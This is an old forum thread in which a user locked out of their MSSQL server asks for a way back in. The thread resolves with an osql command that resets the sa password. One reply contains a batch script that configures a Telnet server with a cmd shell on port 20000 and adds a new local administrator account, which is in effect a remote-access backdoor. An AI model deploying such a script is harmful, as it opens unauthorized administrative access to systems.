Full Version: Add Mssql User
c°h°
Feb 14 2004, 02:47 PM
HI,
I have a server with mssql running, it seems that someone changed my pass, is there a way to add a user without rights to access the database only with windows admin rights ?
TIA
jockel
Feb 14 2004, 04:31 PM
what do you mean with "only with windows admin rights" ??
the only way to access windows by mssql server are stored procedures ..
if the user has the right to CREATE or EXECUTE procedures and the mssql server is also starterd with system privileges he can have access to windows ..
otherwise only database access ..
plz be more specific in what you mean .. !?
setthesun
Feb 14 2004, 08:51 PM
If SQL Server running on mixed mode or NT Authentication mode any admin every computer admin can act like SQL sa user.
nowhere
Feb 14 2004, 09:08 PM
i understand he want create a account
only what you can do is create a nt account on that so you can connect via dameware
| QUOTE | @echo off
echo Windows Registry Editor Version 5.00>> tel.reg
echo >> tel.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>> tel.reg
echo "AllowTrustedDomain"=dword:00000001>> tel.reg
echo "DefaultDomain"=hex(2):2e,00,00,00>> tel.reg
echo "DefaultShell"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\>> tel.reg
echo 00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\>> tel.reg
echo 63,00,6d,00,64,00,2e,00,65,00,78,00,65,00,20,00,2f,00,71,00,20,00,2f,00,6b,\>> tel.reg
echo 00,20,00,00,00>> tel.reg
echo "LoginScript"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\>> tel.reg
echo 00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\>> tel.reg
echo 6c,00,6f,00,67,00,69,00,6e,00,2e,00,63,00,6d,00,64,00,00,00>> tel.reg
echo "MaxConnections"=dword:0000003f>> tel.reg
echo "MaxFailedLogins"=dword:00000003>> tel.reg
echo "NTLM"=dword:00000001>> tel.reg
echo "TelnetPort"=dword:00004e20>> tel.reg
echo >> tel.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\Performance]>> tel.reg
echo "NumThreadsPerProcessor"=dword:00000002>> tel.reg
regedit /s tel.reg
net user admin adminame /add
net localgroup administrators admin /add
net start telnet
|
The Storm
Feb 14 2004, 09:48 PM
net user USERNAME /ADD
net user USERNAME Administrators /ADD
then it's finsihed"!!!
eXist
Feb 14 2004, 11:32 PM
| QUOTE (The Storm @ Feb 14 2004, 09:48 PM) | net user USERNAME /ADD
net user USERNAME Administrators /ADD
then it's finsihed"!!! |
Needs to be:
net user USERNAME PASSWORD /ADD
net localgroup USERNAME Administrators /ADD
Gotisch
Feb 15 2004, 12:35 AM
| QUOTE (eXist @ Feb 14 2004, 11:32 PM) | | QUOTE (The Storm @ Feb 14 2004, 09:48 PM) | net user USERNAME /ADD
net user USERNAME Administrators /ADD
then it's finsihed"!!! |
Needs to be:
net user USERNAME PASSWORD /ADD
net localgroup USERNAME Administrators /ADD
|
I think he has access to the pc but some lame kiddie tried to secure the mssql server by changing to admin pass.
Now he cant connect to his db anymore and needs to find a way to change the pass from outside the mssql server.
btw. its
net locagroup (name of the administrators group) username /Add
basepart
Feb 18 2004, 10:43 AM
you can reset the "sa" account password with out the need to know what was the old one,
using the "osql.exe" with the following syntax, from a CLI.
osql -E -Q "sp_password NULL,YourPassword,sa"
You should replace the word "YourPassword" and put your password instead.
cya
c°h°
Feb 18 2004, 11:09 AM
thx basepart worked very well  now i can relax bye
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
